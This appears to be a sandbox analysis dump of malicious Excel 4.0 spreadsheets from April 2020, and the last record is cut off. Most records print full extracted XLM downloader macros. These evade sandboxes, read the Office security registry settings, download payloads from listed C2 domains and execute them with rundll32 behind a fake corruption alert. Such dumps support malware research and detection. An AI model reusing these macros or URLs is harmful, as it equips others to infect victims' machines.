{"version":"0.2","sample":{"sample":"","kind":"file","target":"ab956f1d3e2d04a9178d314f7f7bbe3350ea891805895ef07faedfa54ec44655"},"analysis":{"reported":"2020-04-09T16:18:15Z","score":10},"files":[{"filename":"ab956f1d3e2d04a9178d314f7f7bbe3350ea891805895ef07faedfa54ec44655","filesize":185344,"md5":"78e902d68fd42d838093869d47673881","sha1":"97a27cd20fec6b7fe407a4257953898987abcdec","sha256":"ab956f1d3e2d04a9178d314f7f7bbe3350ea891805895ef07faedfa54ec44655","sha512":"60c0e4beb77c69e67efe7871f950ec5aa2ec7994334a80ed3386ac17e58035edcf6abd95dac6c6b29d7aabfb7370da3adbf8a63ec26d65b532a17178e0bb423e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ab956f1d3e2d04a9178d314f7f7bbe3350ea891805895ef07faedfa54ec44655.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ab9ffa3bc6b6ee4e1b2f84d400e66c496faff1dca0c432b095fe08aac1281673"},"analysis":{"reported":"2020-04-09T16:18:15Z","score":10},"files":[{"filename":"ab9ffa3bc6b6ee4e1b2f84d400e66c496faff1dca0c432b095fe08aac1281673","filesize":177152,"md5":"82051a2feaeaa0c0eedf55c35b9709b9","sha1":"6b6997c7b4156a3c55988dab0fc52cf71697018a","sha256":"ab9ffa3bc6b6ee4e1b2f84d400e66c496faff1dca0c432b095fe08aac1281673","sha512":"ae4489c7792e986556a022bdbe3d8b18366438d7d73364378005127dceb4b5d44403c4ba9411ea0f1601907617dc52dba771ae7e5f3b672b0d2bc45a31adc70f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ab9ffa3bc6b6ee4e1b2f84d400e66c496faff1dca0c432b095fe08aac1281673.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Z19ylqnFzp\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"abb9e29822a5b4f47cbd0406c2be920d49b9451e45322f54c962f188e7780195"},"analysis":{"reported":"2020-04-09T16:18:15Z","score":10},"files":[{"filename":"abb9e29822a5b4f47cbd0406c2be920d49b9451e45322f54c962f188e7780195","filesize":206336,"md5":"2a9b5de6b09ac3438565c5a4c496481d","sha1":"535a769d57de786bfcf1e8f7fd91d1f287564be4","sha256":"abb9e29822a5b4f47cbd0406c2be920d49b9451e45322f54c962f188e7780195","sha512":"33fca9049ca88afb8ad1d7c0dd9692cd4bf79c5873448d5ad1d6759638f15c26d2a9f30091404112938edbcb27f5951c71295c73a89285c674761481608245f1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"abb9e29822a5b4f47cbd0406c2be920d49b9451e45322f54c962f188e7780195.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"iLPj3yyDUd\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"abd127bfff23c6a69eee65dbef4c94ec455bd12631171c16213b3a5b3a6e83b3"},"analysis":{"reported":"2020-04-09T16:18:15Z","score":10},"files":[{"filename":"abd127bfff23c6a69eee65dbef4c94ec455bd12631171c16213b3a5b3a6e83b3","filesize":225280,"md5":"66fff6851662132e54a0add280658f00","sha1":"540ec63a5c685f9f3b88d7dd4bf274bca1692d2f","sha256":"abd127bfff23c6a69eee65dbef4c94ec455bd12631171c16213b3a5b3a6e83b3","sha512":"76da194b082620451c64be7cc1a613bc4484fb61b2473330db59dffc79a8ba7e9f0d24fd085279477acc8ccd9ffab8d7974ea9d6c01d056bd93cb4edc6a8b485","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"abd127bfff23c6a69eee65dbef4c94ec455bd12631171c16213b3a5b3a6e83b3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"g1r3pdkKDQ\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"abeb2ab202b92d966767801048219632bddecfa4575693a8d6cc40376dc3b397"},"analysis":{"reported":"2020-04-09T16:18:15Z","score":10},"files":[{"filename":"abeb2ab202b92d966767801048219632bddecfa4575693a8d6cc40376dc3b397","filesize":144384,"md5":"d076cdf28d0bc44dbfe266e16f9b9e26","sha1":"b9e1f081f2ef4dfcdec92df3e802f26f9ef829b3","sha256":"abeb2ab202b92d966767801048219632bddecfa4575693a8d6cc40376dc3b397","sha512":"bae4c9d17efeaea4489ae86b403fd5afda5b1f69adafe7b4bda320ed240fcec38f55d205c46bca5f2a91f43dd2b9d49ee9e5e4e88f789083bdb66330e9ff9675","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"abeb2ab202b92d966767801048219632bddecfa4575693a8d6cc40376dc3b397.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"6aCWE37NiK\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"abf7d7bfa25a86e3d19e8935f46c394209231e9c2bc715ce1953cecbb92bb6f8"},"analysis":{"reported":"2020-04-09T16:18:15Z","score":10},"files":[{"filename":"abf7d7bfa25a86e3d19e8935f46c394209231e9c2bc715ce1953cecbb92bb6f8","filesize":182784,"md5":"eace499f7d4cdd489986554fa78d3ccd","sha1":"52f9eade1c66712fe5774ec570b0440b46052ecc","sha256":"abf7d7bfa25a86e3d19e8935f46c394209231e9c2bc715ce1953cecbb92bb6f8","sha512":"55e012020b3fd5d522d26807c9c636084f8038e953c8c695bb26b57b17a9e966cdd173bdb01d35309dc2a324c2a62df6d0ac3ef9dd71a04af09aa3145a0dbbeb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"abf7d7bfa25a86e3d19e8935f46c394209231e9c2bc715ce1953cecbb92bb6f8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"SUM(R$36C$3,R$42C$3,R$52C$3,R$62C$3,R$30C$8,R$37C$8,R$45C$8,R$51C$8,R$58C$8)\nSUM(R$36C$4,R$42C$4,R$52C$4,R$62C$4,R$30C$9,R$37C$9,R$45C$9,R$51C$9,R$58C$9)\nSUM(R$36C$5,R$42C$5,R$52C$5,R$62C$5,R$30C$10,R$37C$10,R$45C$10,R$51C$10,R$58C$10)\nSUM(R$36C$5,R$42C$5,R$52C$5,R$62C$5,R$30C$10,R$37C$10,R$45C$10,R$51C$10,R$58C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ac0ed5b33f503cd1fdf42b40fb532711159cc07ed4d44d7e3c801f33b52f0625"},"analysis":{"reported":"2020-04-09T16:18:16Z","score":10},"files":[{"filename":"ac0ed5b33f503cd1fdf42b40fb532711159cc07ed4d44d7e3c801f33b52f0625","filesize":206336,"md5":"164452f4e93170cceb4b6ebed4ca186b","sha1":"160a4f52beebdaa730e5eee4da46c2b1f31516d6","sha256":"ac0ed5b33f503cd1fdf42b40fb532711159cc07ed4d44d7e3c801f33b52f0625","sha512":"c2eb6b442a8c587e270eb5cd76ed9d98701f1ff19cffafe2cb6d1233f064adfa7d54c713e306f218d6fbd24e9df6c0a61851da74b8253ddee47ecd37dfb8b9b5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ac0ed5b33f503cd1fdf42b40fb532711159cc07ed4d44d7e3c801f33b52f0625.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"04MEiZ13MT\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ac3590041a350a82b665e96375583f5af2dbaba6fc23cb342d4e056044c4c9a4"},"analysis":{"reported":"2020-04-09T16:18:16Z","score":10},"files":[{"filename":"ac3590041a350a82b665e96375583f5af2dbaba6fc23cb342d4e056044c4c9a4","filesize":209920,"md5":"93b5c3c1acf91fe3301a0e518a3dc5c5","sha1":"d04e0a624901c391eb1cb5efe3b4d9c4daccc7c2","sha256":"ac3590041a350a82b665e96375583f5af2dbaba6fc23cb342d4e056044c4c9a4","sha512":"5f76a1ab146746af2b06095b292949888992ace070499779c87468500bd40e3785e98bf5468e7b02cb8bc77a0e5a029e7d68f4ce323eabd4ae0e004b7c089964","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ac3590041a350a82b665e96375583f5af2dbaba6fc23cb342d4e056044c4c9a4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"JzPqBVrQNM\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ac3b4bd4ae4ca5b9e48b068981ced837108b13a95d8bb9f9deb192057e7c499c"},"analysis":{"reported":"2020-04-09T16:18:16Z","score":10},"files":[{"filename":"ac3b4bd4ae4ca5b9e48b068981ced837108b13a95d8bb9f9deb192057e7c499c","filesize":116224,"md5":"8e6311629263eaef5d5d2780025bd15d","sha1":"dc5ac593860bb12a5378c48ff7d3dee24a226bec","sha256":"ac3b4bd4ae4ca5b9e48b068981ced837108b13a95d8bb9f9deb192057e7c499c","sha512":"a6324a46b83ff9fc41378ef7c24c912b73dc542cfba04d8f030f6ff180e7412982814d16c37a310acad863eeef5de6480c016cb535e496fe20b471dbb2945ad1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ac3b4bd4ae4ca5b9e48b068981ced837108b13a95d8bb9f9deb192057e7c499c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"5sukkblZDG\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ac3cb8e35f0013447481e4810c334a07d5ca016b77b085eb835f7835ee5fc56c"},"analysis":{"reported":"2020-04-09T16:18:16Z","score":10},"files":[{"filename":"ac3cb8e35f0013447481e4810c334a07d5ca016b77b085eb835f7835ee5fc56c","filesize":247808,"md5":"77da697c2d37a70caf1af9df11e9c320","sha1":"0f58bc969f3b174ea1be9e0d4e172b76972757a9","sha256":"ac3cb8e35f0013447481e4810c334a07d5ca016b77b085eb835f7835ee5fc56c","sha512":"3bfcc3b8b5bc313ac05d7c2f0d12b4a829b742933a44828e355249516444953a6cc630aa5a419870202e07ac085f10ca9b4f1af528c9d7f137ff2715b1c195f5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ac3cb8e35f0013447481e4810c334a07d5ca016b77b085eb835f7835ee5fc56c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"SUM(R$33C$7,R$22C$7,R$11C$7)\nSUM(R$74C$7,R$61C$7,R$48C$7)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ac4aa3f110a890183dc8b05b0adca2ad9a96eb9105490b288d5ed10cb1b9d114"},"analysis":{"reported":"2020-04-09T16:18:16Z","score":10},"files":[{"filename":"ac4aa3f110a890183dc8b05b0adca2ad9a96eb9105490b288d5ed10cb1b9d114","filesize":141312,"md5":"ee8314e32df4b03ab45c770333b96f86","sha1":"7e33d69c56b400a22cd936673262d8e73838edae","sha256":"ac4aa3f110a890183dc8b05b0adca2ad9a96eb9105490b288d5ed10cb1b9d114","sha512":"d771c416563f7af30d27a22a314ac5c681c09e8dd8eae20776977a9d92403f3dac81fc472c65b02bc7764ab4b21e9855cc0b5326005851f1884393540c7fac07","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ac4aa3f110a890183dc8b05b0adca2ad9a96eb9105490b288d5ed10cb1b9d114.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"VEoGPF3jK5\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ac5e46ef00e1c066bb210d58f4ce4d0a7a4724e807467891b161d19b99b12e12"},"analysis":{"reported":"2020-04-09T16:18:16Z","score":10},"files":[{"filename":"ac5e46ef00e1c066bb210d58f4ce4d0a7a4724e807467891b161d19b99b12e12","filesize":113664,"md5":"d86e441d472d59597dfdbef668f51b73","sha1":"4e4c4a22dbac4a757777e8322827594cb122e95d","sha256":"ac5e46ef00e1c066bb210d58f4ce4d0a7a4724e807467891b161d19b99b12e12","sha512":"5d3bb2b000be907d44e522fdbdf5714331cead8b7a7017e60414be5a68868c67a716ec71a3fba302811cd76758fea3897273d0e25ee5d4893ab8deb4033f4858","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ac5e46ef00e1c066bb210d58f4ce4d0a7a4724e807467891b161d19b99b12e12.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"LvZ5pX0Clw\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ac6c024ced3f98b01ea2f083fdd19aef95b501cc28c1fe2d81316e0c3665fd9b"},"analysis":{"reported":"2020-04-09T16:18:16Z","score":10},"files":[{"filename":"ac6c024ced3f98b01ea2f083fdd19aef95b501cc28c1fe2d81316e0c3665fd9b","filesize":209408,"md5":"00d3694a26f1d683ea247182baded26f","sha1":"ec7f03a4412a7151479a23d5b4d90591a8888098","sha256":"ac6c024ced3f98b01ea2f083fdd19aef95b501cc28c1fe2d81316e0c3665fd9b","sha512":"4f45fde5e240e8996d9157f5637c35b3784d4d50db5b3f7cedb7953195e59ec8a4c495187d509d8796e3d2b3fddcdb0cf18994a3727a074819ab4ec2d374987b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ac6c024ced3f98b01ea2f083fdd19aef95b501cc28c1fe2d81316e0c3665fd9b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"LsSFJuW0SE\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ac6ccb6b727377c67be3273a623ad8590090f51b61bdf442e7f45fbb56dd834b"},"analysis":{"reported":"2020-04-09T16:18:16Z","score":10},"files":[{"filename":"ac6ccb6b727377c67be3273a623ad8590090f51b61bdf442e7f45fbb56dd834b","filesize":209920,"md5":"8dfa0b46290802d582d596b94861464e","sha1":"23d3f3dd001868006acce48d2027ed6a80ad9de8","sha256":"ac6ccb6b727377c67be3273a623ad8590090f51b61bdf442e7f45fbb56dd834b","sha512":"954c6fba0996b7a99d134adf05c0fbfd3597747f2f9b0eb93ecdbb0ef2873b8ebc849dad349d8f91f2844dfe2c8613e282b1cc2c79e83219ef500f0e81deed5f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ac6ccb6b727377c67be3273a623ad8590090f51b61bdf442e7f45fbb56dd834b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1vOimgqXfP\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ac7ae8b881956db0541952a769c751b218b3d47ae6c892307e267b30c5ee120d"},"analysis":{"reported":"2020-04-09T16:18:16Z","score":10},"files":[{"filename":"ac7ae8b881956db0541952a769c751b218b3d47ae6c892307e267b30c5ee120d","filesize":167936,"md5":"34a9c6896c6a55510245f89c4c2f574d","sha1":"9248dc96216110b3c3018abdea790a7c50cb555d","sha256":"ac7ae8b881956db0541952a769c751b218b3d47ae6c892307e267b30c5ee120d","sha512":"d085ea02da880baf9ac03f29ed6fa6775a51d8fdcf9006f7ce974b39a69d6de174d2704b5ad98212b8163a15398f6c290267dbaa76113c4195ccd2cee4e46510","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ac7ae8b881956db0541952a769c751b218b3d47ae6c892307e267b30c5ee120d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, 